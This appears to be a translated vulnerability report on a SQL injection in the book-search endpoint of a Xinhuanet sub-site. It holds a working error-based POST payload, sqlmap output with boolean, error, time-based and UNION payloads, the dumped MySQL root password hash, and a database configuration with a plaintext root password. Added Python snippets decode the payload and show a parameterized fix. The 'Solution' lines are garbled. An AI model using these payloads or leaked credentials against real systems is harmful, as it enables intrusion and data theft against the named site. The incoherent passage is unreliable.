Xinhuanet sub-station SQL injection vulnerability leading to a shell
A Xinhuanet sub-station has a SQL injection vulnerability (it can be injected directly and used to write a shell).
POST /index.php?a=search&m=Book HTTP/1.1
Content-Length: 325
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=signature; expires=1448597591,1448597651,1448597738,1448597771; expires=1448597771; HMACCOUNT=DAE66A74F1B9E64B
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

key='and (select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(52)%2cCHAR(75)%2cCHAR(81)%2cCHAR(55)%2cCHAR(83)%2cCHAR(109)%2cCHAR(118)%2cCHAR(52))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) and'

URL-decoded, the key parameter is the classic MySQL error-based probe: the CHAR(52),...,CHAR(52) sequence spells the marker string 4Cu4KQ7Smv4, and GROUP BY over floor(rand(0)*2) forces a duplicate-key error that echoes the marker back in the response:

key='and (select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(52),CHAR(75),CHAR(81),CHAR(55),CHAR(83),CHAR(109),CHAR(118),CHAR(52)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=1%' AND 8851=8851 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: key=1%' AND (SELECT 2176 FROM(SELECT COUNT(*),CONCAT(0x7176787171,(SELECT (ELT(2176=2176,1))),0x716a6b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: key=1%' AND SLEEP(5) AND '%'='

    Type: UNION query
    Title: MySQL UNION query (NULL) - 37 columns
    Payload: key=1%' UNION ALL SELECT CONCAT(0x7176787171,0x7872476242637461637a444b4b45567641506a6978564c695649784271566766484665586e0000854,0x716a6b7671),NULL,NULL,NULL,NULL,NULL,NULL#
---
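The following is an added example, not code from the original report: it URL-decodes the error-based request body shown above, decodes sqlmap's 0x... marker literals, and emulates why MySQL's GROUP BY over floor(rand(0)*2) leaks the injected string in a "Duplicate entry" error. The request body is the one from the report (whitespace normalised); the RAND(seed) generator reproduces MySQL's randominit/my_rnd arithmetic, and the group-by emulation models MySQL's documented double evaluation of a non-deterministic group key (once for the lookup, again on insert).

```python
# Added example, not code from the original report: decode the error-based
# payload posted to /index.php?a=search&m=Book and emulate why MySQL leaks the
# injected string through a "Duplicate entry" error.
import re
from urllib.parse import unquote_plus

# Request body from the report, copied here with its spacing normalised.
BODY = (
    "key='and (select%201%20from(select%20count(*)%2cconcat((select%20concat("
    "CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(52)%2cCHAR(75)%2cCHAR(81)%2cCHAR(55)"
    "%2cCHAR(83)%2cCHAR(109)%2cCHAR(118)%2cCHAR(52))%20from%20information_schema."
    "tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema."
    "tables%20group%20by%20x)a) and'"
)


def decode_payload(body):
    """URL-decode the form body and fold concat(CHAR(n),...) into a string literal."""
    sql = unquote_plus(body.split("=", 1)[1])

    def fold(match):
        codes = re.findall(r"CHAR\((\d+)\)", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"

    return re.sub(r"concat\(CHAR\(\d+\)(?:,CHAR\(\d+\))*\)", fold, sql)


def hex_literal(token):
    """Decode a MySQL 0x... literal such as sqlmap's 0x7176787171 marker."""
    return bytes.fromhex(token[2:]).decode("ascii")


class MySQLRand:
    """MySQL's RAND(seed) generator (randominit/my_rnd in the server source)."""
    MAX_VALUE = 0x3FFFFFFF

    def __init__(self, seed):
        self.s1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % self.MAX_VALUE
        self.s2 = ((seed * 0x10000001) & 0xFFFFFFFF) % self.MAX_VALUE

    def next(self):
        self.s1 = (self.s1 * 3 + self.s2) % self.MAX_VALUE
        self.s2 = (self.s1 + self.s2 + 33) % self.MAX_VALUE
        return self.s1 / self.MAX_VALUE


def emulate_group_by_floor_rand(rows, leaked):
    """Emulate GROUP BY x where x = concat(leaked, floor(rand(0)*2)).

    MySQL evaluates the group key once to look up the temporary table and,
    when the group is new, again while inserting the row. floor(rand(0)*2)
    yields 0,1,1,0,1,... so with at least three rows the third row looks up
    key ...0, misses, then tries to insert key ...1, which already exists:
    the duplicate-key error echoes the leaked string back to the attacker.
    Returns the error text, or None when no collision happens.
    """
    rng = MySQLRand(0)
    groups = {}
    for _ in range(rows):
        key = leaked + str(int(rng.next() * 2))      # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = leaked + str(int(rng.next() * 2))      # re-evaluated on insert
        if key in groups:
            return "Duplicate entry '%s' for key 'group_key'" % key
        groups[key] = 1
    return None


if __name__ == "__main__":
    print(decode_payload(BODY))
    print(hex_literal("0x7176787171"), hex_literal("0x716a6b7671"))
    print(emulate_group_by_floor_rand(3, "4Cu4KQ7Smv4"))
```

The probe only needs a table with three or more rows, which is why both the scanner payload and sqlmap select from information_schema tables that always exist; the sqlmap markers qvxqq and qjkvq simply delimit the leaked value inside the error text.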
Do you want to exploit this SQL injection? [Y/n]
[15:36:06] [INFO] the back-end DBMS is MySQL
Web server operating system: Linux CentOS 6.5
Web application technology: Apache 2.2.15
Back-end DBMS: MySQL 5.0
[*] root [1]:
    password hash: *3EA0DFA79A76FDCA62C8B7D3888C4B1D19D1DFFA
The site's database configuration (root credentials in plain text):

return array(
    'db_host' => 'localhost',
    'db_name' => 'weixinshop',
    'db_user' => 'root',
    'db_pwd' => '4xe6076437',
    'db_port' => '123',
    'db_prefix' => 'weixin_',
);
Virtual machines are not convenient.
Solution:
Three shells read the time and deleted the local no32, which was always blocked. I thought I could not give up. Later I found that the shell was okay.
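As an added example (not part of the original report, and not the site's own code), here is the shape of search query that the sqlmap payloads above imply, a LIKE pattern built by string concatenation, beside a parameterized version that closes the hole. sqlite3 stands in for the target's MySQL; the weixin_book table and its rows are constructed here, with the name assumed from the 'weixin_' prefix in the configuration.

```python
# Added example, not code from the original report: the vulnerable LIKE
# query next to a parameterized one. sqlite3 stands in for MySQL, and the
# weixin_book table (assumed name) is constructed in memory.
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE weixin_book (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO weixin_book VALUES (?, ?)",
                    [(1, "Book one"), (2, "Book two"), (3, "Unrelated")])
    return con


def search_vulnerable(con, key):
    # User input dropped straight into the LIKE pattern: a quote in `key`
    # ends the literal and everything after it is executed as SQL.
    sql = "SELECT id FROM weixin_book WHERE title LIKE '%" + key + "%'"
    return [row[0] for row in con.execute(sql)]


def search_fixed(con, key):
    # The value is bound, so it can never change the statement's structure;
    # LIKE metacharacters are escaped so input cannot widen the match either.
    escaped = key.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT id FROM weixin_book WHERE title LIKE '%' || ? || '%' "
           "ESCAPE '\\'")
    return [row[0] for row in con.execute(sql, (escaped,))]


if __name__ == "__main__":
    db = make_db()
    probe = "zzz%' OR 1=1 AND '%'='"       # boolean-style probe, as sqlmap sends
    print(search_vulnerable(db, probe))     # every row comes back
    print(search_fixed(db, probe))          # nothing matches
```

The same probe that returns every row from the concatenated query matches nothing once the value is bound, and a UNION payload that appends a new SELECT to the vulnerable statement is likewise reduced to a literal search string.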